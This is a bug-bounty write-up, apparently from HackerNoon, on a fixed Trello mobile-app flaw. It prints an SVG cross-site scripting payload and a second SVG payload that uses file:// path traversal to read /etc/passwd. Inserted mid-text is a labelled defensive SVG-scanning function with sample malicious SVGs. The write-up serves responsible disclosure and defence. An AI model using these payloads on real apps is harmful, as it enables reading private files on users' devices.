Cross-Site Scripting to Local File Inclusion on Trello’s App

Written by ajdumanhug | Published 2017/11/28
Tech Story Tags: trello | hackerone | bug-bounty | lfi


Report Status: Fixed

Trello is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process.

They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties for valid bugs, starting from $256 and going up to $4096 depending on the severity of the bug.

Vulnerability

Trello allows its users to upload files through the mobile application. While observing how the upload feature works, I noticed that some file types are rendered directly by the Trello app rather than being handed to a separate viewer, which means any script inside them is executed by the app.

Exploitation

I created a file with an .svg extension containing a script that executes as soon as the file is opened in the app.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg>

After uploading the file above through Trello's app and opening it, the script ran: a simple Cross-Site Scripting.
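As an added example (not code from this write-up or from Trello), here is the kind of check an upload handler could run before storing or rendering an SVG: it rejects files carrying active content such as script elements, event-handler attributes and javascript:/data: links. The function names, the element and attribute lists and the constructed sample inputs are assumptions for illustration.

```javascript
// Added example, not code from the original write-up or from Trello: a
// pre-storage check that rejects SVG uploads carrying active content.
// The element/attribute lists and the constructed samples are assumptions.

// Elements that execute script or embed arbitrary HTML when an SVG is rendered.
const ACTIVE_ELEMENTS = new Set(['script', 'foreignobject', 'iframe', 'embed', 'object']);

// Link schemes that run code or smuggle content when followed.
const DANGEROUS_SCHEME = /^\s*(javascript|vbscript|data)\s*:/i;

// Parse the attribute portion of a start tag into {name, value} pairs.
function parseAttributes(attrText) {
  const attrs = [];
  const re = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : (m[4] || '');
    attrs.push({ name: m[1].toLowerCase(), value });
  }
  return attrs;
}

// Return a list of findings; an empty list means nothing active was seen.
function scanSvg(svgText) {
  const findings = [];
  // Matches start tags and end tags (end tags are skipped). Processing
  // instructions (<?xml ...?>) and comments do not match the name class.
  const tagRe = /<\s*(\/?)\s*([A-Za-z_][\w:.-]*)([^>]*?)\/?>/g;
  let m;
  while ((m = tagRe.exec(svgText)) !== null) {
    if (m[1] === '/') continue;
    const name = m[2].toLowerCase();
    if (ACTIVE_ELEMENTS.has(name)) findings.push(`element <${name}>`);
    for (const attr of parseAttributes(m[3])) {
      if (attr.name.startsWith('on')) {
        findings.push(`event handler ${attr.name} on <${name}>`);
      } else if ((attr.name === 'href' || attr.name === 'xlink:href') && DANGEROUS_SCHEME.test(attr.value)) {
        const scheme = attr.value.trim().split(':')[0].toLowerCase();
        findings.push(`${attr.name} with ${scheme}: URL on <${name}>`);
      }
    }
  }
  return findings;
}

function isSafeSvg(svgText) {
  return scanSvg(svgText).length === 0;
}

// Constructed samples: a harmless icon and three uploads of the kind described above.
const BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>';
const SCRIPT_SVG = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg>';
const HANDLER_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>';
const LINK_SVG = '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><a xlink:href="javascript:alert(1)"><text y="10">click</text></a></svg>';

for (const [label, svg] of Object.entries({ BENIGN_SVG, SCRIPT_SVG, HANDLER_SVG, LINK_SVG })) {
  console.log(label, isSafeSvg(svg) ? 'accept' : 'reject: ' + scanSvg(svg).join('; '));
}
```

This is a coarse, defence-in-depth check: a regular-expression scan is not an XML parser, so markup inside comments produces false positives and unusual encodings can produce misses. The structural fix is not to render user uploads as documents inside the app at all, least of all from a local file:// origin, and instead to serve them as downloads or from an isolated origin, or to rasterize SVGs to a bitmap before display.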

Cross-Site Scripting on Trello

Then I noticed that the file was not only uploaded to their third-party storage service but was also stored locally on the device, and it was the local copy that the app rendered. A script in a document loaded from local storage runs with a file:// origin, and if the app's web view allows file access from file URLs, that script can request other local files. That is why I immediately thought of a Local File Inclusion.

So I created another payload inside the .svg file that locates and reads the /etc/passwd file and displays its contents.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>
// Synchronous GET of an arbitrary URL, here a file:// path, and display of the body.
function readTextFile(file) {
  var rawFile = new XMLHttpRequest();
  rawFile.open("GET", file, false);
  rawFile.onreadystatechange = function () {
    if (rawFile.readyState === 4) {
      // Responses to file:// requests report status 0 rather than 200, so accept both.
      if (rawFile.status === 200 || rawFile.status == 0) {
        var allText = rawFile.responseText;
        alert(allText);
      }
    }
  };
  rawFile.send(null);
}
// The leading ../ sequences walk up from wherever the SVG was stored to the filesystem root.
readTextFile("file:///../../../../../../../../../etc/passwd");
</script>
</svg>

After uploading the new .svg file and opening it, the app displayed the contents of the /etc/passwd file.

Reporting

Right after I reported the vulnerability, Trello triaged it and shipped a fix in version 4.0.8 of the app.

Verifying the Fix

Shown below is the screenshot of the fix applied by Trello.

If you’d like to try bug bounty hunting or report a possible security vulnerability, you may view their Bug Bounty Program Policy on HackerOne.


Published by HackerNoon on 2017/11/28